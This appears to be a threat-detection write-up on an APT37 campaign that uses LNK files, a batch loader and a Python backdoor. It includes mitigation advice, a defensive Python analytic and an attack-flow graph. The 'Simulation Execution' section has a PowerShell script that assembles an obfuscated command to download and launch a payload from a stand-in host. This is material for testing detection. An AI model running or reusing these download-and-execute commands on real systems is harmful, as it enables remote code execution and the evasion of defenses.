SOC Prime Bias: Critical

14 May 2026 15:27

Python Backdoor Threat Analysis Following an AI Deepfake Impersonation Campaign

SOC Prime Team

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Summary

The report outlines a multi-stage intrusion campaign linked to the North Korean APT37 group. Initial access begins with spear-phishing emails that carry ZIP archives containing malicious LNK shortcut files. When opened, the LNK launches an obfuscated batch script that downloads additional components and eventually deploys a Python-based backdoor disguised as a .cat file.

Investigation

Researchers observed heavy command obfuscation through environment-variable substring expansion, along with abuse of legitimate tools such as curl.exe and an embedded Python 3.10 runtime. The malware also created a scheduled task to maintain persistence on the host. Investigators identified infrastructure overlaps with earlier APT37 operations, including use of Cafe24 hosting and French .fr domains.

Mitigation

Organizations should harden email defenses, block execution of LNK files extracted from archives, and monitor for unusual batch-script obfuscation patterns. Defenders should also watch for curl.exe and pythonw.exe running from unexpected paths and alert on suspicious scheduled task creation. Behavioral analytics should correlate these process chains with outbound connections to the known command-and-control infrastructure.
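The Investigation and Mitigation points above, as an added defender-side example that is not part of the SOC Prime report: a small analytic over constructed Sysmon Event ID 1 records that emulates cmd.exe's %VAR:~start,len% substring expansion so the reconstructed command (not the obfuscated one) can be matched, and that flags curl.exe or pythonw.exe outside assumed trusted directories and schtasks /create. The environment values in ENV, the sample records in EVENTS, the trusted-path list and the finding strings are all assumptions.

```python
import re
# cmd.exe variable references, including the substring form %VAR:~start,len% used by the loader
VAR_RE = re.compile(r"%([A-Za-z_][A-Za-z0-9_()]*)(?::~(-?\d+)(?:,(-?\d+))?)?%")

def expand_cmd_vars(cmdline, env):
    # Resolve %VAR% and %VAR:~a,b% case-insensitively; unknown variables are left untouched
    lower_env = {k.lower(): v for k, v in env.items()}
    def repl(m):
        value = lower_env.get(m.group(1).lower())
        if value is None or m.group(2) is None:
            return m.group(0) if value is None else value
        n, start = len(value), int(m.group(2))
        length = int(m.group(3)) if m.group(3) else None
        start = max(n + start, 0) if start < 0 else start  # negative start counts from the end
        end = n if length is None else (max(n + length, 0) if length < 0 else start + length)  # negative len trims the end
        return value[start:end]
    return VAR_RE.sub(repl, cmdline)

def unexpected_path(image):
    # Assumed trusted locations for curl.exe / pythonw.exe (tune per estate); anywhere else is unexpected
    name = image.rsplit("\\", 1)[-1]
    if name == "curl.exe":
        return image not in (r"c:\windows\system32\curl.exe", r"c:\windows\syswow64\curl.exe")
    if name == "pythonw.exe":
        return not any(p in image for p in (r"\program files\python", r"\appdata\local\programs\python"))
    return False

def analyze_event(event, env):
    # One Sysmon Event ID 1 record as {"Image": ..., "CommandLine": ...}; returns a list of findings
    image = event["Image"].lower()
    name, raw = image.rsplit("\\", 1)[-1], event["CommandLine"]
    expanded = expand_cmd_vars(raw, env).lower()  # match on the reconstructed command, not the raw one
    findings = []
    if any(m.group(2) for m in VAR_RE.finditer(raw)):
        findings.append("env-var substring expansion in command line")
    if name == "cmd.exe" and re.search(r"\s/k(\s|$)", raw, re.I) and "powershell" in expanded and "bypass" in expanded:
        findings.append("cmd /k launching PowerShell with ExecutionPolicy Bypass")
    if unexpected_path(image):
        findings.append(name + " running from unexpected path")
    if name == "schtasks.exe" and "/create" in raw.lower():
        findings.append("scheduled task creation")
    return findings

ENV = {"ComSpec": r"C:\Windows\System32\cmd.exe", "ProgramFiles": r"C:\Program Files"}  # assumed host values
EVENTS = [  # constructed sample records, not taken from the report
    {"Image": r"C:\Windows\System32\cmd.exe", "CommandLine": r'cmd.exe /k %ProgramFiles:~3,1%ower%ComSpec:~11,1%hell '
     r'-ExecutionPolicy Bypa%ComSpec:~9,1%%ComSpec:~13,1% -Command "curl.exe -o %TEMP%\upd.bat http://example.invalid/stage2"'},
    {"Image": r"C:\Users\victim\AppData\Roaming\pyemb\pythonw.exe", "CommandLine": "pythonw.exe lib.cat"},
    {"Image": r"C:\Windows\System32\schtasks.exe", "CommandLine": r"schtasks.exe /create /sc minute /tn MicrosoftMusicLibrariesPackageTaskMachine /tr C:\Users\victim\AppData\Roaming\pyemb\codeflush.exe"},
]
```

Running analyze_event over the records gives two findings for the cmd.exe record, one each for the pythonw.exe and schtasks.exe records, and none for curl.exe launched from System32.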

Response

If this activity is detected, isolate the affected system, terminate the malicious processes, remove the scheduled task, and delete the dropped Python files. Security teams should also conduct a forensic hunt for related batch scripts, LNK shortcut files, and any exposed credentials. Detection logic should be updated to cover the observed command-line patterns and network indicators.

Attack Flow

graph TB
    %% Class definitions
    classDef action fill:#99ccff
    classDef technique fill:#c2f0c2
    classDef tool fill:#cccccc
    classDef process fill:#ffcc99
    classDef file fill:#ffff99
    classDef persistence fill:#d9b3ff
    classDef c2 fill:#ff9999

    %% Nodes
    action_phishing["<b>Action</b> – <b>T1566.001 Spearphishing Attachment</b><br/>A ZIP archive containing a malicious .lnk shortcut is sent by email."]
    class action_phishing action
    file_zip["<b>File</b> – ZIP archive<br/>Contains the malicious shortcut (lnk)."]
    class file_zip file
    file_lnk["<b>File</b> – Shortcut (lnk)<br/>Used for User Execution and later as a logon autostart."]
    class file_lnk file
    technique_user_exec["<b>Technique</b> – T1204.002 User Execution<br/>Victim opens the shortcut, causing the chain to start."]
    class technique_user_exec technique
    process_cmd["<b>Process</b> – cmd.exe<br/>Reconstructs the real command using environment-variable substring expansion."]
    class process_cmd process
    technique_obfuscation["<b>Technique</b> – T1027.010 Command Obfuscation<br/>Obfuscates the command before reconstruction."]
    class technique_obfuscation technique
    technique_decode["<b>Technique</b> – T1140 Deobfuscate/Decode Files<br/>Decodes the reconstructed command string."]
    class technique_decode technique
    process_powershell["<b>Process</b> – PowerShell<br/>Executes the decoded command and invokes curl.exe."]
    class process_powershell process
    tool_curl["<b>Tool</b> – curl.exe<br/>Legitimate system binary used to download additional payloads."]
    class tool_curl tool
    technique_proxy_exec["<b>Technique</b> – T1218.002 Signed Binary Proxy Execution: Control Panel<br/>Uses a trusted binary to proxy execution."]
    class technique_proxy_exec technique
    technique_software_ext["<b>Technique</b> – T1176 Software Extensions<br/>Leveraging curl.exe as a software extension."]
    class technique_software_ext technique
    file_bat["<b>File</b> – BAT loader<br/>Obfuscated batch script that downloads a Python-embed package."]
    class file_bat file
    tool_pythonw["<b>Tool</b> – pythonw.exe (renamed to codeflush.exe)<br/>Runs the embedded Python payload stealthily."]
    class tool_pythonw tool
    file_payload["<b>File</b> – Compiled Python payload disguised as .cat<br/>Contains the backdoor functionality."]
    class file_payload file
    persistence_task["<b>Persistence</b> – T1053 Scheduled Task<br/>Task named #quot;MicrosoftMusicLibrariesPackageTaskMachine#quot; repeatedly runs codeflush.exe."]
    class persistence_task persistence
    technique_shortcut_mod["<b>Technique</b> – T1547.009 Shortcut Modification<br/>The initial .lnk also serves as a logon autostart entry."]
    class technique_shortcut_mod technique
    malware_backdoor["<b>Malware</b> – Python backdoor (Remote Access Tools)<br/>Communicates with C2, receives Base64 commands, executes them and returns results."]
    class malware_backdoor c2

    %% Connections
    action_phishing -->|delivers| file_zip
    file_zip -->|contains| file_lnk
    file_lnk -->|triggers| technique_user_exec
    technique_user_exec -->|executes| process_cmd
    process_cmd -->|applies| technique_obfuscation
    process_cmd -->|applies| technique_decode
    process_cmd -->|launches| process_powershell
    process_powershell -->|uses| tool_curl
    tool_curl -->|leverages| technique_proxy_exec
    tool_curl -->|leverages| technique_software_ext
    process_powershell -->|downloads| file_bat
    file_bat -->|downloads| tool_pythonw
    tool_pythonw -->|renames to| codeflush_exe["<b>File</b> – codeflush.exe (renamed pythonw)"]
    codeflush_exe -->|loads| file_payload
    file_payload -->|provides| malware_backdoor
    malware_backdoor -->|establishes| c2["<b>Command &amp; Control</b>"]
    malware_backdoor -->|creates| persistence_task
    persistence_task -->|ensures execution of| codeflush_exe
    file_lnk -->|adds| technique_shortcut_mod
    technique_shortcut_mod -->|persists via logon shortcut| persistence_task

    %% Class assignments for edges (optional styling)
    class process_cmd process
    class process_powershell process
    class codeflush_exe process

Simulation Execution

Prerequisite: The Telemetry & Baseline Pre-flight Check must have passed.

Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic.

Attack Narrative & Commands

  1. Goal: The adversary wants to download a second-stage payload from an external server while evading simple command-line bans.

  2. Method: Deploy a malicious .lnk file that, when clicked, launches cmd.exe /k to set a series of environment variables that piece together an obfuscated PowerShell command. The assembled command runs PowerShell with -ExecutionPolicy Bypass and uses curl.exe to fetch the payload.

  3. Steps:

    • a. Create environment variables that store fragments of the final command (e.g., a=%SystemRoot%, b=%SystemRoot%\System32, c=PowerShell, etc.).
    • b. Execute cmd.exe /k "%a%\System32\%c% -ExecutionPolicy Bypass -Command "& { iwr -Uri 'http://malicious.example/payload.exe' -OutFile $env:TEMP\upd.exe; Start-Process $env:TEMP\upd.exe }""
    • c. The curl.exe variant replaces iwr with curl.exe for the same download.

The resulting Sysmon Event ID 1 record will contain an Image of cmd.exe and a CommandLine containing /k together with the PowerShell -ExecutionPolicy Bypass string, satisfying the rule.

Regression Test Script

# --------------------------------------------------------------
# Simulation Script – Triggers the Sigma rule
# --------------------------------------------------------------
# 1. Define obfuscated fragments via environment variables
$env:V1 = "$env:SystemRoot"
$env:V2 = "System32"
$env:V3 = "PowerShell"
$env:V4 = "-ExecutionPolicy"
$env:V5 = "Bypass"
$env:V6 = "-Command"
# The $env:TEMP path is expanded here, at assignment time, so V7 holds the literal download/launch command
$env:V7 = "`"& { iwr -Uri 'http://malicious.example/payload.exe' -OutFile $env:TEMP\upd.exe; Start-Process $env:TEMP\upd.exe }`""

# 2. Build the full command line (still obfuscated); kept for reference so the exact CommandLine the rule will see can be logged
$cmd = "$env:V1\$env:V2\cmd.exe /k `"$env:V1\$env:V2\$env:V3 $env:V4 $env:V5 $env:V6 $env:V7`""

# 3. Execute the command – this will generate the Sysmon event (Image = cmd.exe, CommandLine = /k plus the PowerShell bypass string)
Start-Process -FilePath "$env:V1\$env:V2\cmd.exe" -ArgumentList "/k `"$env:V1\$env:V2\$env:V3 $env:V4 $env:V5 $env:V6 $env:V7`"" -NoNewWindow
# --------------------------------------------------------------

Cleanup Commands

# Remove temporary environment variables
Remove-Item Env:V1, Env:V2, Env:V3, Env:V4, Env:V5, Env:V6, Env:V7 -ErrorAction SilentlyContinue

# Delete the downloaded dummy payload if it exists
Remove-Item -Path "$env:TEMP\upd.exe" -Force -ErrorAction SilentlyContinue